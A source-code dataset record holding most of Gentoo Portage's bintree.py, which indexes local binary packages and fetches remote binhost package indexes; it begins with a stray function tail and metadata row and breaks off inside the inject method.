ret.append(h2_content)
# ret.append({
# 'id': section_id,
# 'title': h2_title,
# 'content': h2_content,
# })
return (ret, headers, section)
| mit | -5,494,567,154,929,641,000 | 30.733967 | 145 | 0.565569 | false | 4.096903 | false | false | false |
clickbeetle/portage-cb | pym/portage/dbapi/bintree.py | 1 | 44915 | # Copyright 1998-2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
__all__ = ["bindbapi", "binarytree"]
import portage
portage.proxy.lazyimport.lazyimport(globals(),
'portage.checksum:hashfunc_map,perform_multiple_checksums,' + \
'verify_all,_apply_hash_filter,_hash_filter',
'portage.dbapi.dep_expand:dep_expand',
'portage.dep:dep_getkey,isjustname,isvalidatom,match_from_list',
'portage.output:EOutput,colorize',
'portage.locks:lockfile,unlockfile',
'portage.package.ebuild.fetch:_check_distfile,_hide_url_passwd',
'portage.update:update_dbentries',
'portage.util:atomic_ofstream,ensure_dirs,normalize_path,' + \
'writemsg,writemsg_stdout',
'portage.util.listdir:listdir',
'portage.util._urlopen:urlopen@_urlopen',
'portage.versions:best,catpkgsplit,catsplit,_pkg_str',
)
from portage.cache.mappings import slot_dict_class
from portage.const import CACHE_PATH
from portage.dbapi.virtual import fakedbapi
from portage.dep import Atom, use_reduce, paren_enclose
from portage.exception import AlarmSignal, InvalidData, InvalidPackageName, \
PermissionDenied, PortageException
from portage.localization import _
from portage import _movefile
from portage import os
from portage import _encodings
from portage import _unicode_decode
from portage import _unicode_encode
import codecs
import errno
import io
import stat
import subprocess
import sys
import tempfile
import textwrap
import warnings
from gzip import GzipFile
from itertools import chain
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
if sys.hexversion >= 0x3000000:
_unicode = str
basestring = str
long = int
else:
_unicode = unicode
class UseCachedCopyOfRemoteIndex(Exception):
# If the local copy is recent enough
# then fetching the remote index can be skipped.
pass
class bindbapi(fakedbapi):
_known_keys = frozenset(list(fakedbapi._known_keys) + \
["CHOST", "repository", "USE"])
def __init__(self, mybintree=None, **kwargs):
fakedbapi.__init__(self, **kwargs)
self.bintree = mybintree
self.move_ent = mybintree.move_ent
self.cpvdict={}
self.cpdict={}
# Selectively cache metadata in order to optimize dep matching.
self._aux_cache_keys = set(
["BUILD_TIME", "CHOST", "DEPEND", "EAPI",
"HDEPEND", "IUSE", "KEYWORDS",
"LICENSE", "PDEPEND", "PROPERTIES", "PROVIDE",
"RDEPEND", "repository", "RESTRICT", "SLOT", "USE", "DEFINED_PHASES"
])
self._aux_cache_slot_dict = slot_dict_class(self._aux_cache_keys)
self._aux_cache = {}
def match(self, *pargs, **kwargs):
if self.bintree and not self.bintree.populated:
self.bintree.populate()
return fakedbapi.match(self, *pargs, **kwargs)
def cpv_exists(self, cpv, myrepo=None):
if self.bintree and not self.bintree.populated:
self.bintree.populate()
return fakedbapi.cpv_exists(self, cpv)
def cpv_inject(self, cpv, **kwargs):
self._aux_cache.pop(cpv, None)
fakedbapi.cpv_inject(self, cpv, **kwargs)
def cpv_remove(self, cpv):
self._aux_cache.pop(cpv, None)
fakedbapi.cpv_remove(self, cpv)
def aux_get(self, mycpv, wants, myrepo=None):
if self.bintree and not self.bintree.populated:
self.bintree.populate()
cache_me = False
if not self._known_keys.intersection(
wants).difference(self._aux_cache_keys):
aux_cache = self._aux_cache.get(mycpv)
if aux_cache is not None:
return [aux_cache.get(x, "") for x in wants]
cache_me = True
mysplit = mycpv.split("/")
mylist = []
tbz2name = mysplit[1]+".tbz2"
if not self.bintree._remotepkgs or \
not self.bintree.isremote(mycpv):
tbz2_path = self.bintree.getname(mycpv)
if not os.path.exists(tbz2_path):
raise KeyError(mycpv)
metadata_bytes = portage.xpak.tbz2(tbz2_path).get_data()
def getitem(k):
v = metadata_bytes.get(_unicode_encode(k,
encoding=_encodings['repo.content'],
errors='backslashreplace'))
if v is not None:
v = _unicode_decode(v,
encoding=_encodings['repo.content'], errors='replace')
return v
else:
getitem = self.bintree._remotepkgs[mycpv].get
mydata = {}
mykeys = wants
if cache_me:
mykeys = self._aux_cache_keys.union(wants)
for x in mykeys:
myval = getitem(x)
# myval is None if the key doesn't exist
# or the tbz2 is corrupt.
if myval:
mydata[x] = " ".join(myval.split())
if not mydata.setdefault('EAPI', _unicode_decode('0')):
mydata['EAPI'] = _unicode_decode('0')
if cache_me:
aux_cache = self._aux_cache_slot_dict()
for x in self._aux_cache_keys:
aux_cache[x] = mydata.get(x, _unicode_decode(''))
self._aux_cache[mycpv] = aux_cache
return [mydata.get(x, _unicode_decode('')) for x in wants]
def aux_update(self, cpv, values):
if not self.bintree.populated:
self.bintree.populate()
tbz2path = self.bintree.getname(cpv)
if not os.path.exists(tbz2path):
raise KeyError(cpv)
mytbz2 = portage.xpak.tbz2(tbz2path)
mydata = mytbz2.get_data()
for k, v in values.items():
k = _unicode_encode(k,
encoding=_encodings['repo.content'], errors='backslashreplace')
v = _unicode_encode(v,
encoding=_encodings['repo.content'], errors='backslashreplace')
mydata[k] = v
for k, v in list(mydata.items()):
if not v:
del mydata[k]
mytbz2.recompose_mem(portage.xpak.xpak_mem(mydata))
# inject will clear stale caches via cpv_inject.
self.bintree.inject(cpv)
def cp_list(self, *pargs, **kwargs):
if not self.bintree.populated:
self.bintree.populate()
return fakedbapi.cp_list(self, *pargs, **kwargs)
def cp_all(self):
if not self.bintree.populated:
self.bintree.populate()
return fakedbapi.cp_all(self)
def cpv_all(self):
if not self.bintree.populated:
self.bintree.populate()
return fakedbapi.cpv_all(self)
def getfetchsizes(self, pkg):
"""
This will raise MissingSignature if SIZE signature is not available,
or InvalidSignature if SIZE signature is invalid.
"""
if not self.bintree.populated:
self.bintree.populate()
pkg = getattr(pkg, 'cpv', pkg)
filesdict = {}
if not self.bintree.isremote(pkg):
pass
else:
metadata = self.bintree._remotepkgs[pkg]
try:
size = int(metadata["SIZE"])
except KeyError:
raise portage.exception.MissingSignature("SIZE")
except ValueError:
raise portage.exception.InvalidSignature(
"SIZE: %s" % metadata["SIZE"])
else:
filesdict[os.path.basename(self.bintree.getname(pkg))] = size
return filesdict
def _pkgindex_cpv_map_latest_build(pkgindex):
"""
Given a PackageIndex instance, create a dict of cpv -> metadata map.
If multiple packages have identical CPV values, prefer the package
with latest BUILD_TIME value.
@param pkgindex: A PackageIndex instance.
@type pkgindex: PackageIndex
@rtype: dict
@return: a dict containing entry for the give cpv.
"""
cpv_map = {}
for d in pkgindex.packages:
cpv = d["CPV"]
try:
cpv = _pkg_str(cpv)
except InvalidData:
writemsg(_("!!! Invalid remote binary package: %s\n") % cpv,
noiselevel=-1)
continue
btime = d.get('BUILD_TIME', '')
try:
btime = int(btime)
except ValueError:
btime = None
other_d = cpv_map.get(cpv)
if other_d is not None:
other_btime = other_d.get('BUILD_TIME', '')
try:
other_btime = int(other_btime)
except ValueError:
other_btime = None
if other_btime and (not btime or other_btime > btime):
continue
cpv_map[_pkg_str(cpv)] = d
return cpv_map
class binarytree(object):
"this tree scans for a list of all packages available in PKGDIR"
def __init__(self, _unused=None, pkgdir=None,
virtual=DeprecationWarning, settings=None):
if pkgdir is None:
raise TypeError("pkgdir parameter is required")
if settings is None:
raise TypeError("settings parameter is required")
if _unused is not None and _unused != settings['ROOT']:
warnings.warn("The root parameter of the "
"portage.dbapi.bintree.binarytree"
" constructor is now unused. Use "
"settings['ROOT'] instead.",
DeprecationWarning, stacklevel=2)
if virtual is not DeprecationWarning:
warnings.warn("The 'virtual' parameter of the "
"portage.dbapi.bintree.binarytree"
" constructor is unused",
DeprecationWarning, stacklevel=2)
if True:
self.pkgdir = normalize_path(pkgdir)
self.dbapi = bindbapi(self, settings=settings)
self.update_ents = self.dbapi.update_ents
self.move_slot_ent = self.dbapi.move_slot_ent
self.populated = 0
self.tree = {}
self._remote_has_index = False
self._remotepkgs = None # remote metadata indexed by cpv
self.invalids = []
self.settings = settings
self._pkg_paths = {}
self._pkgindex_uri = {}
self._populating = False
self._all_directory = os.path.isdir(
os.path.join(self.pkgdir, "All"))
self._pkgindex_version = 0
self._pkgindex_hashes = ["MD5","SHA1"]
self._pkgindex_file = os.path.join(self.pkgdir, "Packages")
self._pkgindex_keys = self.dbapi._aux_cache_keys.copy()
self._pkgindex_keys.update(["CPV", "MTIME", "SIZE"])
self._pkgindex_aux_keys = \
["BUILD_TIME", "CHOST", "DEPEND", "DESCRIPTION", "EAPI",
"HDEPEND", "IUSE", "KEYWORDS", "LICENSE", "PDEPEND", "PROPERTIES",
"PROVIDE", "RDEPEND", "repository", "SLOT", "USE", "DEFINED_PHASES",
"BASE_URI"]
self._pkgindex_aux_keys = list(self._pkgindex_aux_keys)
self._pkgindex_use_evaluated_keys = \
("DEPEND", "HDEPEND", "LICENSE", "RDEPEND",
"PDEPEND", "PROPERTIES", "PROVIDE")
self._pkgindex_header_keys = set([
"ACCEPT_KEYWORDS", "ACCEPT_LICENSE",
"ACCEPT_PROPERTIES", "CBUILD",
"CONFIG_PROTECT", "CONFIG_PROTECT_MASK", "FEATURES",
"GENTOO_MIRRORS", "INSTALL_MASK", "SYNC", "USE"])
self._pkgindex_default_pkg_data = {
"BUILD_TIME" : "",
"DEFINED_PHASES" : "",
"DEPEND" : "",
"EAPI" : "0",
"HDEPEND" : "",
"IUSE" : "",
"KEYWORDS": "",
"LICENSE" : "",
"PATH" : "",
"PDEPEND" : "",
"PROPERTIES" : "",
"PROVIDE" : "",
"RDEPEND" : "",
"RESTRICT": "",
"SLOT" : "0",
"USE" : "",
}
self._pkgindex_inherited_keys = ["CHOST", "repository"]
# Populate the header with appropriate defaults.
self._pkgindex_default_header_data = {
"CHOST" : self.settings.get("CHOST", ""),
"repository" : "",
}
# It is especially important to populate keys like
# "repository" that save space when entries can
# inherit them from the header. If an existing
# pkgindex header already defines these keys, then
# they will appropriately override our defaults.
main_repo = self.settings.repositories.mainRepo()
if main_repo is not None and not main_repo.missing_repo_name:
self._pkgindex_default_header_data["repository"] = \
main_repo.name
self._pkgindex_translated_keys = (
("DESCRIPTION" , "DESC"),
("repository" , "REPO"),
)
self._pkgindex_allowed_pkg_keys = set(chain(
self._pkgindex_keys,
self._pkgindex_aux_keys,
self._pkgindex_hashes,
self._pkgindex_default_pkg_data,
self._pkgindex_inherited_keys,
chain(*self._pkgindex_translated_keys)
))
@property
def root(self):
warnings.warn("The root attribute of "
"portage.dbapi.bintree.binarytree"
" is deprecated. Use "
"settings['ROOT'] instead.",
DeprecationWarning, stacklevel=3)
return self.settings['ROOT']
def move_ent(self, mylist, repo_match=None):
if not self.populated:
self.populate()
origcp = mylist[1]
newcp = mylist[2]
# sanity check
for atom in (origcp, newcp):
if not isjustname(atom):
raise InvalidPackageName(str(atom))
mynewcat = catsplit(newcp)[0]
origmatches=self.dbapi.cp_list(origcp)
moves = 0
if not origmatches:
return moves
for mycpv in origmatches:
try:
mycpv = self.dbapi._pkg_str(mycpv, None)
except (KeyError, InvalidData):
continue
mycpv_cp = portage.cpv_getkey(mycpv)
if mycpv_cp != origcp:
# Ignore PROVIDE virtual match.
continue
if repo_match is not None \
and not repo_match(mycpv.repo):
continue
# Use isvalidatom() to check if this move is valid for the
# EAPI (characters allowed in package names may vary).
if not isvalidatom(newcp, eapi=mycpv.eapi):
continue
mynewcpv = mycpv.replace(mycpv_cp, _unicode(newcp), 1)
myoldpkg = catsplit(mycpv)[1]
mynewpkg = catsplit(mynewcpv)[1]
if (mynewpkg != myoldpkg) and os.path.exists(self.getname(mynewcpv)):
writemsg(_("!!! Cannot update binary: Destination exists.\n"),
noiselevel=-1)
writemsg("!!! "+mycpv+" -> "+mynewcpv+"\n", noiselevel=-1)
continue
tbz2path = self.getname(mycpv)
if os.path.exists(tbz2path) and not os.access(tbz2path,os.W_OK):
writemsg(_("!!! Cannot update readonly binary: %s\n") % mycpv,
noiselevel=-1)
continue
moves += 1
mytbz2 = portage.xpak.tbz2(tbz2path)
mydata = mytbz2.get_data()
updated_items = update_dbentries([mylist], mydata, eapi=mycpv.eapi)
mydata.update(updated_items)
mydata[b'PF'] = \
_unicode_encode(mynewpkg + "\n",
encoding=_encodings['repo.content'])
mydata[b'CATEGORY'] = \
_unicode_encode(mynewcat + "\n",
encoding=_encodings['repo.content'])
if mynewpkg != myoldpkg:
ebuild_data = mydata.pop(_unicode_encode(myoldpkg + '.ebuild',
encoding=_encodings['repo.content']), None)
if ebuild_data is not None:
mydata[_unicode_encode(mynewpkg + '.ebuild',
encoding=_encodings['repo.content'])] = ebuild_data
mytbz2.recompose_mem(portage.xpak.xpak_mem(mydata))
self.dbapi.cpv_remove(mycpv)
del self._pkg_paths[mycpv]
new_path = self.getname(mynewcpv)
self._pkg_paths[mynewcpv] = os.path.join(
*new_path.split(os.path.sep)[-2:])
if new_path != mytbz2:
self._ensure_dir(os.path.dirname(new_path))
_movefile(tbz2path, new_path, mysettings=self.settings)
self._remove_symlink(mycpv)
if new_path.split(os.path.sep)[-2] == "All":
self._create_symlink(mynewcpv)
self.inject(mynewcpv)
return moves
def _remove_symlink(self, cpv):
"""Remove a ${PKGDIR}/${CATEGORY}/${PF}.tbz2 symlink and also remove
the ${PKGDIR}/${CATEGORY} directory if empty. The file will not be
removed if os.path.islink() returns False."""
mycat, mypkg = catsplit(cpv)
mylink = os.path.join(self.pkgdir, mycat, mypkg + ".tbz2")
if os.path.islink(mylink):
"""Only remove it if it's really a link so that this method never
removes a real package that was placed here to avoid a collision."""
os.unlink(mylink)
try:
os.rmdir(os.path.join(self.pkgdir, mycat))
except OSError as e:
if e.errno not in (errno.ENOENT,
errno.ENOTEMPTY, errno.EEXIST):
raise
del e
def _create_symlink(self, cpv):
"""Create a ${PKGDIR}/${CATEGORY}/${PF}.tbz2 symlink (and
${PKGDIR}/${CATEGORY} directory, if necessary). Any file that may
exist in the location of the symlink will first be removed."""
mycat, mypkg = catsplit(cpv)
full_path = os.path.join(self.pkgdir, mycat, mypkg + ".tbz2")
self._ensure_dir(os.path.dirname(full_path))
try:
os.unlink(full_path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
del e
os.symlink(os.path.join("..", "All", mypkg + ".tbz2"), full_path)
def prevent_collision(self, cpv):
"""Make sure that the file location ${PKGDIR}/All/${PF}.tbz2 is safe to
use for a given cpv. If a collision will occur with an existing
package from another category, the existing package will be bumped to
${PKGDIR}/${CATEGORY}/${PF}.tbz2 so that both can coexist."""
if not self._all_directory:
return
# Copy group permissions for new directories that
# may have been created.
for path in ("All", catsplit(cpv)[0]):
path = os.path.join(self.pkgdir, path)
self._ensure_dir(path)
if not os.access(path, os.W_OK):
raise PermissionDenied("access('%s', W_OK)" % path)
full_path = self.getname(cpv)
if "All" == full_path.split(os.path.sep)[-2]:
return
"""Move a colliding package if it exists. Code below this point only
executes in rare cases."""
mycat, mypkg = catsplit(cpv)
myfile = mypkg + ".tbz2"
mypath = os.path.join("All", myfile)
dest_path = os.path.join(self.pkgdir, mypath)
try:
st = os.lstat(dest_path)
except OSError:
st = None
else:
if stat.S_ISLNK(st.st_mode):
st = None
try:
os.unlink(dest_path)
except OSError:
if os.path.exists(dest_path):
raise
if st is not None:
# For invalid packages, other_cat could be None.
other_cat = portage.xpak.tbz2(dest_path).getfile(b"CATEGORY")
if other_cat:
other_cat = _unicode_decode(other_cat,
encoding=_encodings['repo.content'], errors='replace')
other_cat = other_cat.strip()
other_cpv = other_cat + "/" + mypkg
self._move_from_all(other_cpv)
self.inject(other_cpv)
self._move_to_all(cpv)
def _ensure_dir(self, path):
"""
Create the specified directory. Also, copy gid and group mode
bits from self.pkgdir if possible.
@param cat_dir: Absolute path of the directory to be created.
@type cat_dir: String
"""
try:
pkgdir_st = os.stat(self.pkgdir)
except OSError:
ensure_dirs(path)
return
pkgdir_gid = pkgdir_st.st_gid
pkgdir_grp_mode = 0o2070 & pkgdir_st.st_mode
try:
ensure_dirs(path, gid=pkgdir_gid, mode=pkgdir_grp_mode, mask=0)
except PortageException:
if not os.path.isdir(path):
raise
def _move_to_all(self, cpv):
"""If the file exists, move it. Whether or not it exists, update state
for future getname() calls."""
mycat, mypkg = catsplit(cpv)
myfile = mypkg + ".tbz2"
self._pkg_paths[cpv] = os.path.join("All", myfile)
src_path = os.path.join(self.pkgdir, mycat, myfile)
try:
mystat = os.lstat(src_path)
except OSError as e:
mystat = None
if mystat and stat.S_ISREG(mystat.st_mode):
self._ensure_dir(os.path.join(self.pkgdir, "All"))
dest_path = os.path.join(self.pkgdir, "All", myfile)
_movefile(src_path, dest_path, mysettings=self.settings)
self._create_symlink(cpv)
self.inject(cpv)
def _move_from_all(self, cpv):
"""Move a package from ${PKGDIR}/All/${PF}.tbz2 to
${PKGDIR}/${CATEGORY}/${PF}.tbz2 and update state from getname calls."""
self._remove_symlink(cpv)
mycat, mypkg = catsplit(cpv)
myfile = mypkg + ".tbz2"
mypath = os.path.join(mycat, myfile)
dest_path = os.path.join(self.pkgdir, mypath)
self._ensure_dir(os.path.dirname(dest_path))
src_path = os.path.join(self.pkgdir, "All", myfile)
_movefile(src_path, dest_path, mysettings=self.settings)
self._pkg_paths[cpv] = mypath
def populate(self, getbinpkgs=0):
"populates the binarytree"
if self._populating:
return
pkgindex_lock = None
try:
if os.access(self.pkgdir, os.W_OK):
pkgindex_lock = lockfile(self._pkgindex_file,
wantnewlockfile=1)
self._populating = True
self._populate(getbinpkgs)
finally:
if pkgindex_lock:
unlockfile(pkgindex_lock)
self._populating = False
def _populate(self, getbinpkgs=0):
if (not os.path.isdir(self.pkgdir) and not getbinpkgs):
return 0
# Clear all caches in case populate is called multiple times
# as may be the case when _global_updates calls populate()
# prior to performing package moves since it only wants to
# operate on local packages (getbinpkgs=0).
self._remotepkgs = None
self.dbapi._clear_cache()
self.dbapi._aux_cache.clear()
if True:
pkg_paths = {}
self._pkg_paths = pkg_paths
dirs = listdir(self.pkgdir, dirsonly=True, EmptyOnError=True)
if "All" in dirs:
dirs.remove("All")
dirs.sort()
dirs.insert(0, "All")
pkgindex = self._load_pkgindex()
pf_index = None
if not self._pkgindex_version_supported(pkgindex):
pkgindex = self._new_pkgindex()
header = pkgindex.header
metadata = {}
for d in pkgindex.packages:
metadata[d["CPV"]] = d
update_pkgindex = False
for mydir in dirs:
for myfile in listdir(os.path.join(self.pkgdir, mydir)):
if not myfile.endswith(".tbz2"):
continue
mypath = os.path.join(mydir, myfile)
full_path = os.path.join(self.pkgdir, mypath)
s = os.lstat(full_path)
if stat.S_ISLNK(s.st_mode):
continue
# Validate data from the package index and try to avoid
# reading the xpak if possible.
if mydir != "All":
possibilities = None
d = metadata.get(mydir+"/"+myfile[:-5])
if d:
possibilities = [d]
else:
if pf_index is None:
pf_index = {}
for mycpv in metadata:
mycat, mypf = catsplit(mycpv)
pf_index.setdefault(
mypf, []).append(metadata[mycpv])
possibilities = pf_index.get(myfile[:-5])
if possibilities:
match = None
for d in possibilities:
try:
if long(d["MTIME"]) != s[stat.ST_MTIME]:
continue
except (KeyError, ValueError):
continue
try:
if long(d["SIZE"]) != long(s.st_size):
continue
except (KeyError, ValueError):
continue
if not self._pkgindex_keys.difference(d):
match = d
break
if match:
mycpv = match["CPV"]
if mycpv in pkg_paths:
# discard duplicates (All/ is preferred)
continue
mycpv = _pkg_str(mycpv)
pkg_paths[mycpv] = mypath
# update the path if the package has been moved
oldpath = d.get("PATH")
if oldpath and oldpath != mypath:
update_pkgindex = True
if mypath != mycpv + ".tbz2":
d["PATH"] = mypath
if not oldpath:
update_pkgindex = True
else:
d.pop("PATH", None)
if oldpath:
update_pkgindex = True
self.dbapi.cpv_inject(mycpv)
if not self.dbapi._aux_cache_keys.difference(d):
aux_cache = self.dbapi._aux_cache_slot_dict()
for k in self.dbapi._aux_cache_keys:
aux_cache[k] = d[k]
self.dbapi._aux_cache[mycpv] = aux_cache
continue
if not os.access(full_path, os.R_OK):
writemsg(_("!!! Permission denied to read " \
"binary package: '%s'\n") % full_path,
noiselevel=-1)
self.invalids.append(myfile[:-5])
continue
metadata_bytes = portage.xpak.tbz2(full_path).get_data()
mycat = _unicode_decode(metadata_bytes.get(b"CATEGORY", ""),
encoding=_encodings['repo.content'], errors='replace')
mypf = _unicode_decode(metadata_bytes.get(b"PF", ""),
encoding=_encodings['repo.content'], errors='replace')
slot = _unicode_decode(metadata_bytes.get(b"SLOT", ""),
encoding=_encodings['repo.content'], errors='replace')
mypkg = myfile[:-5]
if not mycat or not mypf or not slot:
#old-style or corrupt package
writemsg(_("\n!!! Invalid binary package: '%s'\n") % full_path,
noiselevel=-1)
missing_keys = []
if not mycat:
missing_keys.append("CATEGORY")
if not mypf:
missing_keys.append("PF")
if not slot:
missing_keys.append("SLOT")
msg = []
if missing_keys:
missing_keys.sort()
msg.append(_("Missing metadata key(s): %s.") % \
", ".join(missing_keys))
msg.append(_(" This binary package is not " \
"recoverable and should be deleted."))
for line in textwrap.wrap("".join(msg), 72):
writemsg("!!! %s\n" % line, noiselevel=-1)
self.invalids.append(mypkg)
continue
mycat = mycat.strip()
slot = slot.strip()
if mycat != mydir and mydir != "All":
continue
if mypkg != mypf.strip():
continue
mycpv = mycat + "/" + mypkg
if mycpv in pkg_paths:
# All is first, so it's preferred.
continue
if not self.dbapi._category_re.match(mycat):
writemsg(_("!!! Binary package has an " \
"unrecognized category: '%s'\n") % full_path,
noiselevel=-1)
writemsg(_("!!! '%s' has a category that is not" \
" listed in %setc/portage/categories\n") % \
(mycpv, self.settings["PORTAGE_CONFIGROOT"]),
noiselevel=-1)
continue
mycpv = _pkg_str(mycpv)
pkg_paths[mycpv] = mypath
self.dbapi.cpv_inject(mycpv)
update_pkgindex = True
d = metadata.get(mycpv, {})
if d:
try:
if long(d["MTIME"]) != s[stat.ST_MTIME]:
d.clear()
except (KeyError, ValueError):
d.clear()
if d:
try:
if long(d["SIZE"]) != long(s.st_size):
d.clear()
except (KeyError, ValueError):
d.clear()
d["CPV"] = mycpv
d["SLOT"] = slot
d["MTIME"] = str(s[stat.ST_MTIME])
d["SIZE"] = str(s.st_size)
d.update(zip(self._pkgindex_aux_keys,
self.dbapi.aux_get(mycpv, self._pkgindex_aux_keys)))
try:
self._eval_use_flags(mycpv, d)
except portage.exception.InvalidDependString:
writemsg(_("!!! Invalid binary package: '%s'\n") % \
self.getname(mycpv), noiselevel=-1)
self.dbapi.cpv_remove(mycpv)
del pkg_paths[mycpv]
# record location if it's non-default
if mypath != mycpv + ".tbz2":
d["PATH"] = mypath
else:
d.pop("PATH", None)
metadata[mycpv] = d
if not self.dbapi._aux_cache_keys.difference(d):
aux_cache = self.dbapi._aux_cache_slot_dict()
for k in self.dbapi._aux_cache_keys:
aux_cache[k] = d[k]
self.dbapi._aux_cache[mycpv] = aux_cache
for cpv in list(metadata):
if cpv not in pkg_paths:
del metadata[cpv]
# Do not bother to write the Packages index if $PKGDIR/All/ exists
# since it will provide no benefit due to the need to read CATEGORY
# from xpak.
if update_pkgindex and os.access(self.pkgdir, os.W_OK):
del pkgindex.packages[:]
pkgindex.packages.extend(iter(metadata.values()))
self._update_pkgindex_header(pkgindex.header)
self._pkgindex_write(pkgindex)
if getbinpkgs and not self.settings["PORTAGE_BINHOST"]:
writemsg(_("!!! PORTAGE_BINHOST unset, but use is requested.\n"),
noiselevel=-1)
if not getbinpkgs or 'PORTAGE_BINHOST' not in self.settings:
self.populated=1
return
self._remotepkgs = {}
for base_url in self.settings["PORTAGE_BINHOST"].split():
parsed_url = urlparse(base_url)
host = parsed_url.netloc
port = parsed_url.port
user = None
passwd = None
user_passwd = ""
if "@" in host:
user, host = host.split("@", 1)
user_passwd = user + "@"
if ":" in user:
user, passwd = user.split(":", 1)
port_args = []
if port is not None:
port_str = ":%s" % (port,)
if host.endswith(port_str):
host = host[:-len(port_str)]
pkgindex_file = os.path.join(self.settings["EROOT"], CACHE_PATH, "binhost",
host, parsed_url.path.lstrip("/"), "Packages")
pkgindex = self._new_pkgindex()
try:
f = io.open(_unicode_encode(pkgindex_file,
encoding=_encodings['fs'], errors='strict'),
mode='r', encoding=_encodings['repo.content'],
errors='replace')
try:
pkgindex.read(f)
finally:
f.close()
except EnvironmentError as e:
if e.errno != errno.ENOENT:
raise
local_timestamp = pkgindex.header.get("TIMESTAMP", None)
remote_timestamp = None
rmt_idx = self._new_pkgindex()
proc = None
tmp_filename = None
try:
# urlparse.urljoin() only works correctly with recognized
# protocols and requires the base url to have a trailing
# slash, so join manually...
url = base_url.rstrip("/") + "/Packages"
try:
f = _urlopen(url, if_modified_since=local_timestamp)
if hasattr(f, 'headers') and f.headers.get('timestamp', ''):
remote_timestamp = f.headers.get('timestamp')
except IOError as err:
if hasattr(err, 'code') and err.code == 304: # not modified (since local_timestamp)
raise UseCachedCopyOfRemoteIndex()
path = parsed_url.path.rstrip("/") + "/Packages"
if parsed_url.scheme == 'sftp':
# The sftp command complains about 'Illegal seek' if
# we try to make it write to /dev/stdout, so use a
# temp file instead.
fd, tmp_filename = tempfile.mkstemp()
os.close(fd)
if port is not None:
port_args = ['-P', "%s" % (port,)]
proc = subprocess.Popen(['sftp'] + port_args + \
[user_passwd + host + ":" + path, tmp_filename])
if proc.wait() != os.EX_OK:
raise
f = open(tmp_filename, 'rb')
elif parsed_url.scheme == 'ssh':
if port is not None:
port_args = ['-p', "%s" % (port,)]
proc = subprocess.Popen(['ssh'] + port_args + \
[user_passwd + host, '--', 'cat', path],
stdout=subprocess.PIPE)
f = proc.stdout
else:
setting = 'FETCHCOMMAND_' + parsed_url.scheme.upper()
fcmd = self.settings.get(setting)
if not fcmd:
raise
fd, tmp_filename = tempfile.mkstemp()
tmp_dirname, tmp_basename = os.path.split(tmp_filename)
os.close(fd)
success = portage.getbinpkg.file_get(url,
tmp_dirname, fcmd=fcmd, filename=tmp_basename)
if not success:
raise EnvironmentError("%s failed" % (setting,))
f = open(tmp_filename, 'rb')
f_dec = codecs.iterdecode(f,
_encodings['repo.content'], errors='replace')
try:
rmt_idx.readHeader(f_dec)
if not remote_timestamp: # in case it had not been read from HTTP header
remote_timestamp = rmt_idx.header.get("TIMESTAMP", None)
if not remote_timestamp:
# no timestamp in the header, something's wrong
pkgindex = None
writemsg(_("\n\n!!! Binhost package index " \
" has no TIMESTAMP field.\n"), noiselevel=-1)
else:
if not self._pkgindex_version_supported(rmt_idx):
writemsg(_("\n\n!!! Binhost package index version" \
" is not supported: '%s'\n") % \
rmt_idx.header.get("VERSION"), noiselevel=-1)
pkgindex = None
elif local_timestamp != remote_timestamp:
rmt_idx.readBody(f_dec)
pkgindex = rmt_idx
finally:
# Timeout after 5 seconds, in case close() blocks
# indefinitely (see bug #350139).
try:
try:
AlarmSignal.register(5)
f.close()
finally:
AlarmSignal.unregister()
except AlarmSignal:
writemsg("\n\n!!! %s\n" % \
_("Timed out while closing connection to binhost"),
noiselevel=-1)
except UseCachedCopyOfRemoteIndex:
writemsg_stdout("\n")
writemsg_stdout(
colorize("GOOD", _("Local copy of remote index is up-to-date and will be used.")) + \
"\n")
rmt_idx = pkgindex
except EnvironmentError as e:
writemsg(_("\n\n!!! Error fetching binhost package" \
" info from '%s'\n") % _hide_url_passwd(base_url))
writemsg("!!! %s\n\n" % str(e))
del e
pkgindex = None
if proc is not None:
if proc.poll() is None:
proc.kill()
proc.wait()
proc = None
if tmp_filename is not None:
try:
os.unlink(tmp_filename)
except OSError:
pass
if pkgindex is rmt_idx:
pkgindex.modified = False # don't update the header
try:
ensure_dirs(os.path.dirname(pkgindex_file))
f = atomic_ofstream(pkgindex_file)
pkgindex.write(f)
f.close()
except (IOError, PortageException):
if os.access(os.path.dirname(pkgindex_file), os.W_OK):
raise
# The current user doesn't have permission to cache the
# file, but that's alright.
if pkgindex:
# Organize remote package list as a cpv -> metadata map.
remotepkgs = _pkgindex_cpv_map_latest_build(pkgindex)
remote_base_uri = pkgindex.header.get("URI", base_url)
for cpv, remote_metadata in remotepkgs.items():
remote_metadata["BASE_URI"] = remote_base_uri
self._pkgindex_uri[cpv] = url
self._remotepkgs.update(remotepkgs)
self._remote_has_index = True
for cpv in remotepkgs:
self.dbapi.cpv_inject(cpv)
if True:
# Remote package instances override local package
# if they are not identical.
hash_names = ["SIZE"] + self._pkgindex_hashes
for cpv, local_metadata in metadata.items():
remote_metadata = self._remotepkgs.get(cpv)
if remote_metadata is None:
continue
# Use digests to compare identity.
identical = True
for hash_name in hash_names:
local_value = local_metadata.get(hash_name)
if local_value is None:
continue
remote_value = remote_metadata.get(hash_name)
if remote_value is None:
continue
if local_value != remote_value:
identical = False
break
if identical:
del self._remotepkgs[cpv]
else:
# Override the local package in the aux_get cache.
self.dbapi._aux_cache[cpv] = remote_metadata
else:
# Local package instances override remote instances.
for cpv in metadata:
self._remotepkgs.pop(cpv, None)
self.populated=1
def inject(self, cpv, filename=None):
"""Add a freshly built package to the database. This updates
$PKGDIR/Packages with the new package metadata (including MD5).
@param cpv: The cpv of the new package to inject
@type cpv: string
@param filename: File path of the package to inject, or None if it's
already in the location returned by getname()
@type filename: string
@rtype: None
"""
mycat, mypkg = catsplit(cpv)
if not self.populated:
self.populate()
if filename is None:
full_path = self.getname(cpv)
else:
full_path = filename
try:
s = os.stat(full_path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
del e
writemsg(_("!!! Binary package does not exist: '%s'\n") % full_path,
noiselevel=-1)
return
mytbz2 = portage.xpak.tbz2(full_path)
slot = mytbz2.getfile("SLOT")
if slot is None:
writemsg(_("!!! Invalid binary package: '%s'\n") % full_path,
noiselevel=-1)
return
slot = slot.strip()
self.dbapi.cpv_inject(cpv)
# Reread the Packages index (in case it's been changed by another
# process) and then updated it, all while holding a lock.
pkgindex_lock = None
created_symlink = False
try:
pkgindex_lock = lockfile(self._pkgindex_file,
wantnewlockfile=1)
if filename is not None:
